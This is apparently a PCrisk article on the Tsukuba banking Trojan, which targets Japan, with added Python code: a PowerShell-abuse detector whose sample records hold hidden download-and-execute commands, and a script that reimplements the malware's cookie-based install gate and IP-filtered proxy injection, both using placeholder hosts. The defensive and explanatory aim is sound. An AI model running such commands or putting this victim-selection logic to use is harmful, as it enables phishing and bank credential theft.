New Banking Trojan Targets Japan, Proves Simplicity Is Still Effective

Researchers at IBM Trusteer recently discovered a new banking Trojan that has been dubbed Tsukuba. This relatively simple but effective piece of financial malware belongs to the ‘proxy changer’ family, which uses social engineering to harvest victims’ online banking credentials and other personal information. In a recent blog post about Tsukuba, the researchers explain that the malware operates in three stages.

First, Tsukuba is wrapped in a packer, a loader that obstructs debugging and analysis by common antivirus tools. The packed file is distributed through ordinary spam campaigns. When a victim opens the attachment, the packer calls the CreateProcess API with the CREATE_SUSPENDED flag: the new process is created in a suspended state so the packer can place the unpacked payload into it before it is resumed. Because the malicious code only ever exists in memory, inside a process that looked harmless when it was created, the installation is harder for Windows security tools to spot, and a researcher cannot simply attach a debugger to the packed file and step into the real code.

The malware also disguises its communication with its command-and-control (C&C) servers and its downloads of additional files and components by running them through a legitimate, Microsoft-signed Windows binary, powershell.exe, rather than through its own executable. Network activity that appears to originate from PowerShell draws less attention from common anti-malware tools and from a casual look at the process list.
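A defender's first check for the PowerShell abuse described above is to look at which process launches powershell.exe and what it is told to do. The script below is an added example for this article, not IBM Trusteer's or PCrisk's code: it scores constructed process-creation records (a hypothetical "parent|image|commandline" layout) against a generic heuristic and reports launches that combine an unusual parent with a download or an evasion flag. The sample records, the field layout and the threshold are all assumptions, and the rules are not a Tsukuba signature.

```python
"""Score PowerShell launches in process-creation records.

Added example for this article (not IBM Trusteer's or PCrisk's code).
The records below are constructed and use a hypothetical
"parent|image|commandline" layout; the scoring rules are a generic
heuristic for downloader abuse of powershell.exe, not a Tsukuba signature.
"""
import re

# Constructed sample records: parent image | image | command line.
SAMPLE_EVENTS = r"""
C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile
C:\Users\user\AppData\Local\Temp\invoice.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.bin','C:\Users\user\AppData\Roaming\a.exe')"
C:\Windows\System32\svchost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -EncodedCommand SQBFAFgA
C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
C:\Windows\System32\cmd.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt
"""

# Parents that should rarely spawn PowerShell on a workstation:
# Office, script hosts, or anything running from a user-writable path.
SUSPICIOUS_PARENT = re.compile(
    r"\\(winword|excel|powerpnt|outlook|wscript|cscript|mshta)\.exe$|\\AppData\\|\\Temp\\",
    re.IGNORECASE)
# Command-line fragments that fetch content from the network.
DOWNLOADER = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b"
    r"|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)
# Flags commonly used to hide or obscure the invocation.
EVASION = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}"
    r"|-(?:ep|executionpolicy)\s+bypass|\bIEX\b|Invoke-Expression",
    re.IGNORECASE)


def parse_record(line):
    """Split one 'parent|image|commandline' record; the command line may contain '|'."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}


def score_record(rec):
    """Return (score, reasons). Images other than powershell.exe score 0."""
    if not rec["image"].lower().endswith("\\powershell.exe"):
        return 0, []
    reasons = []
    if SUSPICIOUS_PARENT.search(rec["parent"]):
        reasons.append("launched from Office, a script host or a user-writable path")
    if DOWNLOADER.search(rec["cmdline"]):
        reasons.append("command line fetches content from the network")
    if EVASION.search(rec["cmdline"]):
        reasons.append("hidden window, encoded command, policy bypass or IEX")
    return len(reasons), reasons


def find_suspicious(log_text, threshold=2):
    """Records scoring at least `threshold`, as (line_no, score, parent, reasons)."""
    hits = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        if not line.strip():
            continue
        rec = parse_record(line)
        score, reasons = score_record(rec)
        if score >= threshold:
            hits.append((n, score, rec["parent"], reasons))
    return hits


if __name__ == "__main__":
    for n, score, parent, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"record {n}: score {score}, parent {parent}")
        for r in reasons:
            print("   -", r)
```

With the default threshold of 2, only the Temp-dropped executable and the Word document that spawn a hidden, downloading PowerShell are reported; the svchost.exe launch with an encoded command scores 1 and is left for a lower threshold or for correlation with other events.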

During installation the malware also scans the browser cookies on the target machine for URLs of interest to the attackers. Installation continues only if the cookies show that the victim visits sites the campaign is targeting; otherwise Tsukuba stops short of installing itself. Aborting on uninteresting machines keeps the malware “under the radar”, since it never leaves a full footprint where there is nothing to steal. Finally, the malware installs a rogue root certificate and reroutes the victim’s browsing through its own proxy server. With that certificate trusted, the proxy can serve the attackers’ fake banking pages over HTTPS without triggering certificate warnings. This proxy redirection is what places Tsukuba in the proxy-changer family.

Banking Trojan attacks Japan

What makes this variant dangerous is that once the rogue proxy is in place, the attackers decide which source IP addresses are served the Trojan’s social engineering pages. In this campaign only Japanese IPs get through. Japanese users see far fewer banking Trojan campaigns than users in English-speaking countries, so they are less practised at recognising the phishing and social engineering pages designed to steal their personal and financial data. That said, because the campaign is narrowed by IP address only after the installation-time cookie check has already selected victims by browsing habits, the same two-stage approach could be nearly as effective in other countries, the United States included.
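The two filters just described, the cookie check at install time and the source-IP gate at the proxy, are easiest to reason about side by side. The script below is an added example for this article, not the malware’s code and not IBM Trusteer’s: it parses a constructed cookie store, decides whether installation should proceed, and then makes the per-request decision a rogue proxy would make for a given client address and URL. The cookies.txt layout, the target hostnames (all under example.invalid) and the “Japanese” address ranges (documentation prefixes, not real allocations) are assumptions made so the logic has something concrete to run on.

```python
"""Two-stage victim selection of the kind described for Tsukuba.

Added example for this article; not the malware's code and not IBM
Trusteer's. The cookie store, the target hostnames (all under
example.invalid) and the "Japanese" address ranges are constructed
placeholders, and the Netscape cookies.txt layout is an assumption made so
the stage-1 check has something concrete to parse.
"""
import ipaddress
from urllib.parse import urlsplit

# Stage 1 input: a cookie store in cookies.txt layout, tab separated:
# domain, include-subdomains, path, secure, expiry, name, value.
COOKIES_TXT = """\
# Netscape HTTP Cookie File
.bank-a.example.invalid\tTRUE\t/\tTRUE\t1900000000\tsession\tabc123
www.news.example.invalid\tFALSE\t/\tFALSE\t1900000000\tpref\tja
login.bank-c.example.invalid\tFALSE\t/login\tTRUE\t1900000000\tSID\txyz
"""

# Hostnames the campaign is interested in (constructed).
TARGET_HOSTS = {
    "www.bank-a.example.invalid",
    "online.bank-b.example.invalid",
    "login.bank-c.example.invalid",
}

# Stage 2 input: placeholder ranges standing in for the attackers' list of
# allowed (Japanese) allocations; documentation prefixes, not real ones.
ALLOWED_NETWORKS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/25")]


def cookie_domains(cookies_txt):
    """Yield (domain, host_only) per cookie; comments and short lines are skipped."""
    for line in cookies_txt.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 7:
            continue
        domain, include_subdomains = fields[0], fields[1].upper() == "TRUE"
        yield domain.lstrip(".").lower(), not include_subdomains


def domain_matches(cookie_domain, host_only, target_host):
    """Host-only cookies match exactly; domain cookies also cover subdomains."""
    if target_host == cookie_domain:
        return True
    return (not host_only) and target_host.endswith("." + cookie_domain)


def matching_targets(cookies_txt, targets=TARGET_HOSTS):
    """Stage 1: the targeted hosts this browser already holds cookies for."""
    return {t for d, host_only in cookie_domains(cookies_txt)
            for t in targets if domain_matches(d, host_only, t)}


def should_install(cookies_txt, targets=TARGET_HOSTS):
    """The install-time gate: continue only when the victim banks with a target."""
    return bool(matching_targets(cookies_txt, targets))


def proxy_decision(client_ip, url, allowed=ALLOWED_NETWORKS, targets=TARGET_HOSTS):
    """Stage 2, per request at the rogue proxy: 'inject' the social-engineering
    page only for a targeted host *and* an allowed source address; everything
    else is forwarded untouched so the proxy stays invisible."""
    host = urlsplit(url).hostname          # already lower-cased by urlsplit
    if host is None or host not in targets:
        return "passthrough"
    addr = ipaddress.ip_address(client_ip)
    if any(addr in net for net in allowed):
        return "inject"
    return "passthrough"


if __name__ == "__main__":
    print("install:", should_install(COOKIES_TXT), sorted(matching_targets(COOKIES_TXT)))
    for ip, url in (("203.0.113.7", "https://www.bank-a.example.invalid/login"),
                    ("192.0.2.7", "https://www.bank-a.example.invalid/login"),
                    ("203.0.113.7", "https://www.news.example.invalid/")):
        print(ip, url, "->", proxy_decision(ip, url))
```

The important property for an investigator is that both gates fail closed: a machine with no cookies for a targeted bank never gets the full install, and a request from outside the allowed ranges is forwarded exactly as a normal proxy would forward it, so an analyst replaying the traffic from the wrong country sees nothing malicious.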

What Tsukuba proves is that a set of techniques individually considered dated in the PC security field, combined carefully and in the “right” order, can still produce malware capable of slipping past common anti-malware defences and causing millions of dollars in losses.

The best way to protect yourself from Tsukuba is to keep your PC updated at all times and to avoid opening unsolicited email attachments, which is how the Tsukuba payload arrives. Be wary of any web page that asks for more personal or financial details than your bank normally requires, particularly one reached from a link in an email; that request is the social engineering step that actually steals the data. Your bank or other financial institution will never ask for your password, full account number or similar information, because the legitimate institution already has it on file. On a suspect machine, two cheap checks catch this malware family: look in the Trusted Root Certification Authorities store for a certificate you did not install, and check the browser’s proxy settings (proxy server or automatic configuration URL) for an entry pointing somewhere unexpected.


About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has over five years of experience in this field. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about the technical aspects and behavior of various malicious applications.
